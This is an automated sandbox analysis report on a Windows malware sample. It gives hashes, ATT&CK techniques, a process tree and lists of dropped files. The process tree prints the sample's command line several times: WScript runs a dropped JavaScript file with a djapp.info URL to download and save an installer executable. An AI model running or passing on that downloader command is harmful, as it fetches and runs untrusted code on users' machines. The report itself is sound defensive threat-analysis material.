5a531abdbc9327c04035951f175682d0272c0c62f484b8adb7e0c8fc97fe397b

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
25-09-2024 20:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe
Size

184KB
MD5

f6d885fd766bea14a67d5302ca3d258f
SHA1

044e4aa23ea461d70f73bd9bcd5365d0c9ded3f8
SHA256

5a531abdbc9327c04035951f175682d0272c0c62f484b8adb7e0c8fc97fe397b
SHA512

0d7ed97b9c05cff41fc81597a4cd932e1d2e3c8ee0a9d8108fafb7d43448e46d2db52558f87091832048a90c1d11085f6eaa1161cd220b7568f32c8c5d903cf2
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3l:/7BSH8zUB+nGESaaRvoB7FJNndns

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	1984	WScript.exe
8	1984	WScript.exe
10	1984	WScript.exe
12	2796	WScript.exe
13	2796	WScript.exe
15	676	WScript.exe
16	676	WScript.exe
18	1796	WScript.exe
19	1796	WScript.exe
21	2056	WScript.exe
22	2056	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2396 wrote to memory of 1984	2396	f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe	30
PID 2396 wrote to memory of 1984	2396	f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe	30
PID 2396 wrote to memory of 1984	2396	f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe	30
PID 2396 wrote to memory of 1984	2396	f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe	30
PID 2396 wrote to memory of 2796	2396	f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe	33
PID 2396 wrote to memory of 2796	2396	f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe	33
PID 2396 wrote to memory of 2796	2396	f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe	33
PID 2396 wrote to memory of 2796	2396	f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe	33
PID 2396 wrote to memory of 676	2396	f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe	35
PID 2396 wrote to memory of 676	2396	f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe	35
PID 2396 wrote to memory of 676	2396	f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe	35
PID 2396 wrote to memory of 676	2396	f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe	35
PID 2396 wrote to memory of 1796	2396	f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe	37
PID 2396 wrote to memory of 1796	2396	f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe	37
PID 2396 wrote to memory of 1796	2396	f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe	37
PID 2396 wrote to memory of 1796	2396	f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe	37
PID 2396 wrote to memory of 2056	2396	f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe	39
PID 2396 wrote to memory of 2056	2396	f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe	39
PID 2396 wrote to memory of 2056	2396	f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe	39
PID 2396 wrote to memory of 2056	2396	f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe	39

C:\Users\Admin\AppData\Local\Temp\f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2396
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf9EFD.js" http://www.djapp.info/?domain=XCBoCmjxJa.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf9EFD.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1984
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf9EFD.js" http://www.djapp.info/?domain=XCBoCmjxJa.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf9EFD.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2796
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf9EFD.js" http://www.djapp.info/?domain=XCBoCmjxJa.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf9EFD.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:676
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf9EFD.js" http://www.djapp.info/?domain=XCBoCmjxJa.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf9EFD.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1796
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf9EFD.js" http://www.djapp.info/?domain=XCBoCmjxJa.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf9EFD.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2056

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
a59d87db292ed8575282292b03a0ac26

SHA1
d0a9516b2129246400672e1173c6039132402282

SHA256
a984b1efa164bc572e95df45ed9db3cd0772842bd06429c04383a5a3605422e4

SHA512
7c7296eaeb449164ad7bc7b4a3470b9ca6dc95f4a953fd3fffaf4a7bd5c191ee1bb14576c052fa78d6e510c3641cae205092e63ff16605d32f3d695c7a4fd0ec

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
d97014654a0868160b60de11febe108c

SHA1
c69c92448afd85f70b104ce8c8623fcdd29df425

SHA256
e571815eb3dd75941d45bdaf666ac168ab2f55827039fc77bdbc3c767b5c1bbf

SHA512
747f35dd2b5ed68e214381d29335907e1c6001cf30505f0a8d7f5d7770dd2e756004f7edf25329443a168473816b4ff288c1cdd9369e726167a8c862e362bd59

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DJB1KT77\domain_profile[1].htm

Filesize
6KB

MD5
d403d6a565fc7e3aed147626726730b0

SHA1
6313a806d566243ccc6e97c581064b7ca90e8fd1

SHA256
96741a597c8cf5bf55e2fc0ccc37de651f369f1b67abce8d7c597983253b9098

SHA512
fc74868af365f006dd3a39701ca35b29ea421264df1ba6a77444f5ccc2af7f280bcb5f15ea752b8beea0dce71845b8908fc3dfa8d579a6fb234987a0f5321e60

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DJB1KT77\domain_profile[1].htm

Filesize
6KB

MD5
c02aa0358539dbe2ddab7af77c518720

SHA1
223f604f7143fb1946ba8f155d3451ef045d2ebb

SHA256
5de4384f89bd9286dca8d2c0501743cc79a0fd7ec86f6b130715cd02170f224d

SHA512
718801d67382c485d5a5327f8225e41e10b4f07483cf2c9ff3fb004a5cf388cbc1869c9f61580a2d827a875d285cea257f4469f5476ec206276a8c2b4673192f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPUI9R2R\domain_profile[1].htm

Filesize
6KB

MD5
a5c14b964304fb74c98bb88a073ac4c3

SHA1
e8cc2803eba1bf3a5ed69488a96c2e060cce758a

SHA256
7ffa1945089692db2c6012ca77bfe323116ec99045f808190edbb5b6ec8c5848

SHA512
754fc70262d9f062c11e46fa75aa249db7274bc4677b0c157466861f998b97363e6ab06bd41ffd352573b4bed3de809a46a00a4e4aaaf1a702e86cf97415ce62

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPUI9R2R\domain_profile[1].htm

Filesize
40KB

MD5
efebdcdbfd8a1e7c5c56ab90c80e1e9c

SHA1
199ffbfc9b1c477f2c787013eada4d112873bf3e

SHA256
2fe73f7fd1b3d2e34cbe88dafd56fac6b1389edcad7cf09726a5cb742b2cf758

SHA512
e97430c60906d88560eb75dbb3cfcf3a3d6e83263bc981ccf7d4c9dd957cf597c921e4dc0e5fc74521fbb89794157f561beff53bfe9f2a11f373fe87ac9324b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabE743.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarFF85.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf9EFD.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\GM0478WZ.txt

Filesize
175B

MD5
0d7e0aa0ab5247eb9a0a88770a865b70

SHA1
883db58cde5d0236d3c8f32e827e8b3ea6880409

SHA256
8f1af368f82c42b0aa0c515b91e0a6c286d66f8f6e8a9d2abd84c3b62e6691ce

SHA512
84fa8459f7582bd84b467d42abfa6413ed4ef6de9e757eeb27165b95c88751fb36dc0022eb098367922df86ddc9ae00e9667212bc807a384bf0b3997ddc12d45

Download Submit